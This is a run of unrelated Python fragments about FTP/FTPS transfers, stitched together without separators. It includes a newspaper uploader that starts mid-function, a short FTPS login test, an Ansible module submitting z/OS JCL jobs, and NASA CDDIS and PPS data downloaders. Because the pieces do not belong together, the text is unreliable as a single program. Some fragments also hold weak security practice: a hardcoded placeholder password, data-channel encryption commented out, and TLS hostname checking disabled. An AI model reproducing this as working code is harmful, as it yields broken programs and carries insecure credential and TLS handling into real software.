        counter_dict[upload_folder_name] = counter_dict.get(upload_folder_name, 0) + 1
        temp_sql_result[i] = data + (counter_dict[upload_folder_name],)
    del counter_dict

    # BUG FIX: iterate the fetched (and counter-augmented) rows. The original
    # looped over `cursor`, which was already exhausted by fetchall() and
    # whose connection was closed — so no issue was ever transmitted.
    for data in temp_sql_result:
        finish_count += 1
        noid, news_abbrev, year, month, day, language, counter = data
        upload_folder_name = "%s-%d%02d%02d%02d" % (news_abbrev, year, month, day, counter)
        try:
            # For now, always put into 'separate' folder, but need to put into
            # different language folder
            ftps.cwd("%s/separate" % language_abbrev_map[language])
            print(f"Start processing {upload_folder_name}. NOID: {noid}", color=[42])

            # Generate folders on FTP server; download from OpenStack Swift,
            # upload to FTP server.
            try_make_dir(ftps, upload_folder_name)
            all_skipped = True
            for target_folder in transmit_folder_list:
                try_make_dir(ftps, f"{upload_folder_name}/{target_folder}")

                # Check if the file is already on FTP server
                compare_result = compare_size(ftps, noid, upload_folder_name, target_folder)
                if compare_result[0] and compare_result[1]:
                    print(f"{upload_folder_name}/{target_folder}/1.tar already exist on server. NOID: {noid}", color=[34])
                    continue

                # For new / different files, overwrite files on FTP server
                all_skipped = False
                print(f"Transmitting {upload_folder_name}/{target_folder}/1.tar")

                # Try to download from the OpenStack Swift server
                err = subprocess.run(
                    ["swift", *swift_login, "download", "newspapers",
                     f"{noid}/{target_folder}/1.tar", "-o", f"{temp_folder}/1.tar"],
                    stderr=subprocess.PIPE).stderr.decode()
                if err:
                    raise error_perm("File does not exist on Swift.")

                # Overwrite files on FTP server
                with open(f"{temp_folder}/1.tar", "rb") as transmit_file:
                    ftps.storbinary(f"STOR {upload_folder_name}/{target_folder}/1.tar", transmit_file)

                # Clean up
                subprocess.run(["rm", "-f", f"{temp_folder}/1.tar"])

            # Get back to the production folder to reselect the language for
            # the next issue
            ftps.cwd("../..")

            # Log the success message (FIX: "Finined" typo -> "Finished")
            with open("successlog.log", 'a') as success_log:
                print(f"Finished {upload_folder_name}. NOID: {noid}", color=[42])
                success_log.write(f"{noid}|{upload_folder_name}|Success\n")

            # For file that already on FTP, skip them
            if all_skipped:
                print(f"{upload_folder_name} already exist on server. NOID: {noid} ({finish_count}/{total})", color=[34])
                skip_count += 1
                continue

        # Stop current transmission if error occurs
        except error_perm as e:
            ftps.cwd("~/uploads/production")
            fail_count += 1
            # Log the reason
            with open("errorlog.log", 'a') as error_log:
                print("Error occurs when transmitting %s." % noid, color=[5, 41])
                error_log.write(f"Error occurs when transmitting |{noid}|{upload_folder_name}|{e}\n")

        # Give a detailed program status analysis
        current_time = datetime.datetime.now()
        progress = f"{finish_count} out of {total} ({finish_count * 100 / total:.2f}%), {fail_count} failed"
        max_len = len(progress) + 10
        print(f"{'=' * (max_len + 26)}", color=[1, 7, 93])
        print(f" Current time is: ", end='', color=[1, 7, 93])
        print(f"{current_time}", color=[7, 93], fit_len=max_len)
        print(f" Current progress: ", end='', color=[1, 7, 93])
        print(f"{progress}", color=[7, 93], fit_len=max_len)
        current_run_time = current_time - start_time
        current_progress_perc = (finish_count - skip_count) / (total - skip_count)
        estimate_remain = current_run_time / current_progress_perc - current_run_time
        print(f" Current total runtime: ", end='', color=[1, 7, 93])
        print(f"{current_run_time}", color=[7, 93], fit_len=max_len)
        print(f" Last update runtime: ", end='', color=[1, 7, 93])
        print(f"{current_time - previous_time}", color=[7, 93], fit_len=max_len)
        print(f" Estimate remaining: ", end='', color=[1, 7, 93])
        print(f"{estimate_remain}", color=[7, 93], fit_len=max_len)
        print(f" Estimate finish time: ", end='', color=[1, 7, 93])
        print(f"{current_time + estimate_remain}", color=[7, 93], fit_len=max_len)
        print(f"{'=' * (max_len + 26)}", color=[1, 7, 93])
        previous_time = current_time

    ftps.close()
    # Clean up temporary folder
    subprocess.run(["rm", "-r", temp_folder])
import os
from ftplib import FTP_TLS  # FIX: FTP_TLS was used without being imported

# Define credentials (placeholders — do not commit real secrets)
user = '******'
secret = '123456'
host = '192.168.1.113'

# FIX: the original snippet had a `try:` with no matching `except`, which is
# a SyntaxError; a minimal handler is added so the script is valid and fails
# loudly instead of crashing the interpreter at parse time.
try:
    # instantiate FTPS
    # ftps = FTP_TLS(host, user, secret)
    ftps = FTP_TLS(host)
    # TODO check why ftps.login(user, secret) does not work on this server.
    # See http://stackoverflow.com/questions/10207628/python-module-ftplib-ftp-tls-error-530
    # Try TLS Lite or M2Crypto both are FTP/TLS client and server.
    ftps.sendcmd('USER ' + user)
    ftps.sendcmd('PASS ' + secret)
    print(ftps.getwelcome())
    print('CURRENT WORKING DIRECTORY IS:', ftps.pwd())

    # Enable data encryption
    # TODO solve the encryption problem
    # ftps.prot_p()

    # Change to the default DIR and list its contents, sorted.
    d = 'feeds'
    ftps.cwd(d)
    l = ftps.nlst()
    l.sort()
    for i in l:
        print(i)
except Exception as exc:
    print('FTP session failed:', exc)
def run_module():
    """Ansible module entry point: submit a JCL job to z/OS over FTP(S) and
    poll for its completion.

    Reads connection settings from the environment (FTP_HOST, FTP_PORT,
    FTP_USERID, FTP_PASSWORD, optional FTP_TLS_VERSION / FTP_TLS_CERT_FILE /
    FTP_SOCKS_PORT), submits `src` from a data set, USS or local file, then
    watches job output until a completion message or the `wait_time_s`
    timeout. Exits via module.exit_json / module.fail_json.
    """
    module_args = dict(src=dict(type="str", required=True),
                       wait=dict(type="bool", required=False),
                       location=dict(
                           type="str",
                           default="DATA_SET",
                           choices=["DATA_SET", "USS", "LOCAL"],
                       ),
                       volume=dict(type="str", required=False),
                       return_output=dict(type="bool", required=False, default=True),
                       wait_time_s=dict(type="int", default=60),
                       max_rc=dict(type="int", required=False))
    module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
    result = dict(changed=False, )
    location = module.params["location"]
    volume = module.params["volume"]
    wait = module.params["wait"]
    src = module.params["src"]
    return_output = module.params["return_output"]
    wait_time_s = module.params["wait_time_s"]
    max_rc = module.params["max_rc"]
    if wait_time_s <= 0:
        module.fail_json(
            msg="The option wait_time_s is not valid. It must be greater than 0.",
            **result)

    # Optional SOCKS5 tunnel: monkey-patch the socket module before any
    # FTP connection is created.
    if environ.get('FTP_SOCKS_PORT'):
        import socks
        import socket
        socks.set_default_proxy(socks.SOCKS5, "127.0.0.1",
                                int(environ.get('FTP_SOCKS_PORT')))
        socket.socket = socks.socksocket

    try:
        if environ.get('FTP_TLS_VERSION'):
            from ftplib import FTP_TLS
            import ssl
            cert_file_path = environ.get('FTP_TLS_CERT_FILE')
            if cert_file_path:
                if not path.isfile(cert_file_path):
                    # FIX: "cartificate" typo in the error message.
                    module.fail_json(
                        msg="The TLS certificate file not found: {0}".format(
                            repr(cert_file_path)),
                        **result)
                context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                context.load_verify_locations(cert_file_path)
                # Host is typically addressed by IP here; hostname checks
                # would fail against the certificate CN.
                context.check_hostname = False
                ftp = FTP_TLS(context=context)
            else:
                ftp = FTP_TLS()
            tls_version = environ.get('FTP_TLS_VERSION')
            if tls_version == '1.2':
                ftp.ssl_version = ssl.PROTOCOL_TLSv1_2
        else:
            ftp = FTP()
        ftp.connect(environ.get('FTP_HOST'), int(environ.get('FTP_PORT') or 21))
        ftp.login(environ.get('FTP_USERID'), environ.get('FTP_PASSWORD'))
        # Switch the FTP server into JES (job entry subsystem) mode.
        ftp.sendcmd("site filetype=jes")
        ftp.set_pasv(True)
        if environ.get('FTP_TLS_VERSION'):
            ftp.prot_p()
    except Exception as e:
        module.fail_json(
            msg="An unexpected error occurred during FTP login: {0}".format(
                repr(e)),
            **result)

    # MVS data set name: up to 22 qualifiers, optional (MEMBER) suffix.
    DSN_REGEX = r"^(?:(?:[A-Z$#@]{1}[A-Z0-9$#@-]{0,7})(?:[.]{1})){1,21}[A-Z$#@]{1}[A-Z0-9$#@-]{0,7}(?:\([A-Z$#@]{1}[A-Z0-9$#@]{0,7}\)){0,1}$"
    try:
        if location == "DATA_SET":
            data_set_name_pattern = re.compile(DSN_REGEX, re.IGNORECASE)
            if PY2:
                # Python 2 has no fullmatch; the anchored pattern compensates.
                check = data_set_name_pattern.match(src)
            else:
                check = data_set_name_pattern.fullmatch(src)
            if check:
                if volume is None or volume == "":
                    jobId = submit_pds_jcl(src, ftp, module)
                else:
                    jobId = submit_jcl_in_volume(src, volume, ftp, module)
            else:
                ftp.quit()
                module.fail_json(
                    msg="The parameter src for data set is not a valid name pattern. Please check the src input.",
                    **result)
        else:
            jobId = submit_ftp_jcl(src, ftp, module)
    except SubmitJCLError as e:
        module.fail_json(msg=repr(e), **result)

    if jobId is None or jobId == "":
        result["job_id"] = jobId
        ftp.quit()
        module.fail_json(
            msg="JOB ID Returned is None. Please check whether the JCL is valid.",
            **result)
    result["job_id"] = jobId
    if not wait:
        # Even without wait, poll briefly so short jobs report their outcome.
        wait_time_s = 10

    # real time loop - will be used regardless of 'wait' to capture data
    starttime = timer()
    loopdone = False
    foundissue = None
    # FIX: initialize so the generic except below cannot hit a NameError
    # when the very first job_output() call raises.
    job_output_txt = None
    while not loopdone:
        try:
            job_output_txt = job_output(ftp, wait_time_s, job_id=jobId)
        except IndexError:
            # Job output not available yet; keep polling.
            pass
        except Exception as e:
            # FIX: the original format string "{1} {2}.\n" raised IndexError
            # (only two positional args, so valid indices are 0 and 1).
            result["err_detail"] = "{0} {1}.\n".format(
                "Error during job submission. The output is:",
                job_output_txt or " ")
            module.fail_json(msg=repr(e), **result)
        if bool(job_output_txt):
            jot_retcode = job_output_txt[0].get("ret_code")
            if bool(jot_retcode):
                job_msg = jot_retcode.get("msg")
                if re.search("^(?:{0})".format("|".join(JOB_COMPLETION_MESSAGES)), job_msg):
                    loopdone = True
                    # if the message doesn't have a CC, it is an improper
                    # completion (error/abend)
                    if re.search("^(?:CC)", job_msg) is None:
                        foundissue = job_msg
        if not loopdone:
            checktime = timer()
            duration = round(checktime - starttime)
            if duration >= wait_time_s:
                loopdone = True
                result["message"] = {
                    "stdout": "Submit JCL operation succeeded but it is a long running job, exceeding the timeout of "
                    + str(wait_time_s) + " seconds. JobID is " + str(jobId) + "."
                }
            else:
                sleep(1)
    # End real time loop ^^^

    if bool(job_output_txt):
        result["jobs"] = job_output_txt
    checktime = timer()
    duration = round(checktime - starttime)
    result["duration"] = duration
    result["changed"] = True
    if duration >= wait_time_s:
        result["message"] = {
            "stdout": "Submit JCL operation succeeded but it is a long running job. Timeout is "
            + str(wait_time_s) + " seconds. JobID is " + str(jobId) + "."
        }
    else:
        if foundissue is not None:
            result["changed"] = False
            result["message"] = {
                "stderr": "Submit succeeded, but job failed: " + foundissue
            }
            result["failed"] = True
            module.fail_json(msg=result["message"], **result)
        # NOTE(review): assumes result["jobs"][0]["ret_code"]["code"] exists
        # when return_output is True — confirm job_output guarantees this.
        elif (wait is True and return_output is True and max_rc is not None
              and max_rc < result.get("jobs")[0].get("ret_code").get("code")):
            result["message"] = {
                "stderr": "Submit succeeded, but the return code is more than max_rc: {0}"
                .format(max_rc)
            }
            result["failed"] = True
            module.fail_json(msg=result["message"], **result)
        else:
            result["message"] = {
                "stdout": "Submit JCL operation succeeded with id of " + str(jobId) + "."
            }
    module.exit_json(**result)
def main(master_schedule, db_name):
    """Download the IVS master schedule and, for each experiment not already
    in the database, its SKD file, analysis report and spool file from the
    CDDIS FTPS archive.

    :param master_schedule: file name of the master schedule on CDDIS
    :param db_name: database checked (via `checkExistingData`) for
        experiments that are already processed
    """
    schedule = str(master_schedule)

    # CDDIS requires FTPS with anonymous login and a protected data channel.
    ftps = FTP_TLS(host='gdc.cddis.eosdis.nasa.gov')
    ftps.login()
    ftps.prot_p()

    # Fetch the master schedule in binary ('TYPE I') mode.
    master_sched_filename = os.path.join(dirname, schedule)
    with open(master_sched_filename, "wb") as mf:
        ftps.sendcmd('TYPE I')
        ftps.retrbinary('RETR /pub/vlbi/ivscontrol/' + schedule, mf.write)

    valid_experiment = validExpFinder(os.path.join(dirname, schedule))
    existing_experiments = checkExistingData(str(db_name))
    if existing_experiments is None:  # FIX: `is None`, not `== None`
        experiments_to_download = valid_experiment
    else:
        experiments_to_download = [
            x for x in valid_experiment if x not in existing_experiments
        ]
    # Master schedule name encodes a 2-digit year at positions 6:8.
    year = '20' + schedule[6:8]

    for exp in experiments_to_download:
        if os.path.isfile(dirname + '/analysis_reports/' + exp.lower() + '_report.txt'):
            print("Analysis report already exists for " + exp.lower() +
                  ", skipping file downloads.")
            continue
        exp = exp.lower()
        print('Beginning file downloads for experiment ' + exp + ".")
        # Fresh connection per experiment (long runs outlive idle timeouts).
        ftps = FTP_TLS(host='gdc.cddis.eosdis.nasa.gov')
        ftps.login()
        ftps.prot_p()

        # Download SKED file
        try:
            filename_skd = []
            ftps.retrlines(
                'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' +
                exp + '.skd', filename_skd.append)
            if len(filename_skd) > 0:
                local_filename_skd = os.path.join(dirname, 'skd_files/' + exp + '.skd')
                ftps.sendcmd('TYPE I')
                with open(local_filename_skd, "wb") as lf3:
                    ftps.retrbinary(
                        'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp +
                        '/' + exp + ".skd", lf3.write)
        except Exception:
            print('No SKED file found for ' + exp)

        # Analysis report names are unfortunately not standardised — sometimes
        # they differ even within the same experiment (e.g. 'ivs' and 'IVS'),
        # so every spelling is tried until one matches.
        options = ['ivs', 'IVS', 'usno', 'USNO', 'NASA']

        # Now time to download analysis report
        for spelling in options:
            filename_report = []
            try:
                ftps.retrlines(
                    'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp +
                    '/' + exp + '-' + spelling + '-analysis-report*',
                    filename_report.append)
                if len(filename_report) > 0:
                    local_filename_report = os.path.join(
                        dirname, 'analysis_reports/' + exp + '_report.txt')
                    ftps.sendcmd('TYPE I')
                    with open(local_filename_report, "wb") as lf1:
                        # Field 8 of the LIST line is the remote file name.
                        ftps.retrbinary(
                            'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' +
                            exp + '/' + filename_report[-1].split()[8],
                            lf1.write)
                    print('Analysis report downloaded for experiment ' + exp + ".")
                    break
            except Exception:
                pass  # best-effort: try the next spelling

        # Download spool file
        for spelling in options:
            filename_spool = []
            try:
                ftps.retrlines(
                    'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp +
                    '/' + exp + '-' + spelling + '-analysis-spoolfile*',
                    filename_spool.append)
                if len(filename_spool) > 0:
                    local_filename_spool = os.path.join(
                        dirname, 'analysis_reports/' + exp + '_spoolfile.txt')
                    ftps.sendcmd('TYPE I')
                    with open(local_filename_spool, "wb") as lf2:
                        # BUG FIX: the original indexed filename_spool with
                        # len(filename_report) - 1 (the wrong list's length),
                        # which could raise IndexError or pick a wrong entry.
                        ftps.retrbinary(
                            'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' +
                            exp + '/' + filename_spool[-1].split()[8],
                            lf2.write)
                    print('Spoolfile downloaded for experiment ' + exp + ".")
                    break
            except Exception:
                pass  # best-effort: try the next spelling

        # Download old style analysis report if it exists.
        try:
            filename_report_old = []
            ftps.retrlines(
                'LIST /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp + '/' +
                exp + '-analyst.txt', filename_report_old.append)
            if len(filename_report_old) > 0:
                local_filename_report = os.path.join(
                    dirname, 'analysis_reports/' + exp + '_report.txt')
                ftps.sendcmd('TYPE I')
                with open(local_filename_report, "wb") as lf1:
                    ftps.retrbinary(
                        'RETR /pub/vlbi/ivsdata/aux/' + str(year) + '/' + exp +
                        '/' + exp + "-analyst.txt", lf1.write)
        except Exception:
            pass  # best-effort: old-style report is optional
def getPpsFiles():
    # Download a fixed manifest of IMERG GIS half-hourly zip archives from
    # the NASA PPS server, preferring FTPS and falling back to HTTPS basic
    # auth when FTPS is unavailable or forceHttps is set.
    # NOTE(review): relies on module-level state defined elsewhere in this
    # file: get(path, sha1) (the actual transfer/verify helper), userid,
    # downloadCount, skipCount — confirm against the rest of the module.
    global ftpConnection,forceHttps
    print ('Connecting to PPS')
    if forceHttps==False:
        try:
            ftpConnection = FTP_TLS('arthurhouftps.pps.eosdis.nasa.gov')
            print (ftpConnection.getwelcome())
            # PPS authenticates with the registered e-mail address used as
            # both user name and password.
            ftpConnection.login(userid,userid)
            ftpConnection.sendcmd('TYPE i')  # binary transfer mode
            print ('Connected. Getting files...')
        except Exception as e:
            print ('Failed to connect to the PPS ftps server due to ' + str(e))
            print ('Trying https')
            ftpConnection=None
    if (ftpConnection==None):
        # FTPS unavailable (or forced off): install a global urllib opener
        # with HTTP basic auth so get() can fetch the same paths over HTTPS.
        password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        password_mgr.add_password(None,'https://arthurhouhttps.pps.eosdis.nasa.gov',userid,userid)
        handler = urllib.request.HTTPBasicAuthHandler(password_mgr)
        opener = urllib.request.build_opener(handler)
        urllib.request.install_opener(opener)
    # The following is the list of PPS files to transfer:
    # (generated manifest — remote path plus expected SHA-1 of each archive;
    # do not edit by hand)
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S000000-E002959.0000.V06B.zip','ce82a32890c2b891eafdfaebaa2d107c538bd9b6')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S003000-E005959.0030.V06B.zip','33da0df515f21fae42329ed83f04f6b1a857175e')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S010000-E012959.0060.V06B.zip','99e7154baf640900083b55172825230c2200599d')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S013000-E015959.0090.V06B.zip','6fc80450b77a8d8e4257eec9cc8ad070a58627fc')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S020000-E022959.0120.V06B.zip','f74f4ee73333dda7c426fb2b56092de77ff8a727')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S023000-E025959.0150.V06B.zip','8fb23ea8b38abe91abf16c86de82a2e571d42bff')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S030000-E032959.0180.V06B.zip','53959d210c4401140691c9d28723a3f56dc5a60b')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S033000-E035959.0210.V06B.zip','1b773294f449e5b379777d3a02141207521a0c31')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S040000-E042959.0240.V06B.zip','094e6b2550368219144bfaa82f777e0207a3a8ea')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S043000-E045959.0270.V06B.zip','f4632100f6826cfbedf9fbef34f2e79584ad3ca5')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S050000-E052959.0300.V06B.zip','fadfce2182686cd6e7e52e02820e327cf30ce48c')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S053000-E055959.0330.V06B.zip','f628751c2ef625bd6a603e92cecac69fcc8a0bb1')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S060000-E062959.0360.V06B.zip','e6082a960b38eb7863aa456a67738ffba1c21bee')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S063000-E065959.0390.V06B.zip','9ccca67db72a4aa98aaa1a621cc45f7d10a72799')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S070000-E072959.0420.V06B.zip','78fbea6837987ec7ad9eef48cace9ae398e22b2f')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S073000-E075959.0450.V06B.zip','d2d3f6f972e5a4fd5fe19002b6b0bf88a6ed867b')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S080000-E082959.0480.V06B.zip','ad55f523e2cec0e4b6cb9148175819b1acfd9ba8')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S083000-E085959.0510.V06B.zip','ddb641fadf9df87ac5f2733bcb9784bbe505e31d')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S090000-E092959.0540.V06B.zip','4bb606027c6359d3b59bca6420c1b1c0d6d5f44a')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S093000-E095959.0570.V06B.zip','2c2ad36c23645286b54c476e7d56648e2dfe4426')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S100000-E102959.0600.V06B.zip','26c103abd68721a388af108c25ad9b9008db6bcc')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S103000-E105959.0630.V06B.zip','b6985532ab631800f945ca68f243d4cfd009d750')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S110000-E112959.0660.V06B.zip','9333172d77f7f25f8df4558bae45bdc5c81d8fd2')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S113000-E115959.0690.V06B.zip','5bce0f1f5d52fbaab062b283d5b612e1f7215c3a')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S120000-E122959.0720.V06B.zip','5686f4afb2ae750c449664bc84c487f874b762a8')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S123000-E125959.0750.V06B.zip','c67f4bc665289b12531623346e744725079cd014')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S130000-E132959.0780.V06B.zip','56043e6650920cc447763cbb0cfc26097ada104a')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S133000-E135959.0810.V06B.zip','895f1c03ab457fd496cc93e98855bd2314f76d53')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S140000-E142959.0840.V06B.zip','c1f438461031505dc4f6571b4b9500a5ed3ed2d5')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S143000-E145959.0870.V06B.zip','68aed6165f7d6d10f5c368308b189427e17605fd')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S150000-E152959.0900.V06B.zip','f5d15b0d3ba45f42b98b710348f1a9a8bc5391e2')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S153000-E155959.0930.V06B.zip','1c6cd9ed50534b68368a4f3ff9465d27b4ea9b74')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S160000-E162959.0960.V06B.zip','85605ce4a96672ca38288a09ba606ab45918467c')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S163000-E165959.0990.V06B.zip','264f851646becd8d2cddf12fdf16f5940fbbd1a8')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S170000-E172959.1020.V06B.zip','35c92a72d8924d23dab92fcd7e4749f37ed55330')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S173000-E175959.1050.V06B.zip','c4351aec55f88be87e613aa98ea86df1dba84ec6')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S180000-E182959.1080.V06B.zip','0d1209dd8abc9dc3b5a9f3b63af2d80598923407')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S183000-E185959.1110.V06B.zip','2bee9f971b9ff7e5b94ab8c7556860dbdf1c82f9')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S190000-E192959.1140.V06B.zip','507906bc28ac6f125ef4ec417ea1b5e9c8aff3bc')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S193000-E195959.1170.V06B.zip','eace5c76336fb62c6743c7b73a4197828f360e6c')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S200000-E202959.1200.V06B.zip','cbcd8e090f11ec5879e0afa63344957dd4d6d74c')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S203000-E205959.1230.V06B.zip','3ba05cb83f72e2246ddedb1260029bde11e341c1')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S210000-E212959.1260.V06B.zip','337d000609646665b7ce45cd4b9198c0efed9e0e')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S213000-E215959.1290.V06B.zip','632609817a31f3ae40e8d9e8f4cc83b7ba0feefd')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S220000-E222959.1320.V06B.zip','8d25c208d713dd9b9b49f857a187c3a92d93a9ee')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S223000-E225959.1350.V06B.zip','67cbf6b57b1e97186cb0c0fc95362f1f1abe8be8')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S230000-E232959.1380.V06B.zip','4f7c16ce9dd0a0e723a3c46f8ec37a4f007f421a')
    get('/gpmallversions/V06/2015/08/26/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150826-S233000-E235959.1410.V06B.zip','532238d12c4ed37d4ffd39872e7ef4603650d5ee')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S000000-E002959.0000.V06B.zip','70f07e79472364124d387d9292a797d88a4ff9bd')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S003000-E005959.0030.V06B.zip','d661f48d3665c2f778f57350f498b1cf1973a061')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S010000-E012959.0060.V06B.zip','77e7fb92f460a8de1f13731c5222fda8386e6441')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S013000-E015959.0090.V06B.zip','e2ecab2f92454878acce5596955beb2ad7f294fd')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S020000-E022959.0120.V06B.zip','2cb7fb6e0a811a8bfa1369607c4b1fd65217ad07')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S023000-E025959.0150.V06B.zip','e8ef0cc8ad19244d7733172ce921ac5ffc41cf50')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S030000-E032959.0180.V06B.zip','aba06d4fa1a184f35c17bc844a5f107b6c2d0197')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S033000-E035959.0210.V06B.zip','69af687244be0db96c2fe174c854ef30e46a41d9')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S040000-E042959.0240.V06B.zip','557e5a863cedafa7417fd18ee6b27a3161e38099')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S043000-E045959.0270.V06B.zip','308699bad3690324ee094ce7c783a14bcaacbfae')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S050000-E052959.0300.V06B.zip','4df9a1b513b725b377cfbe6661b2a16c64ccfa61')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S053000-E055959.0330.V06B.zip','0b31205ea68e18f9a8c011223d8c38defbece6ea')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S060000-E062959.0360.V06B.zip','e5934be9d1cf741eee2dd3ee4b33eaee22f258d5')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S063000-E065959.0390.V06B.zip','380525497b03617967aafcba50cbe3b2d761fc61')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S070000-E072959.0420.V06B.zip','100d5b9ae4e29d8fd557764551f3a5c55dafa7a7')
    get('/gpmallversions/V06/2015/08/27/gis/3B-HHR-GIS.MS.MRG.3IMERG.20150827-S073000-E075959.0450.V06B.zip','ad6cd0b49ae10c31e9b0c68b50f659b3c85dc31f')
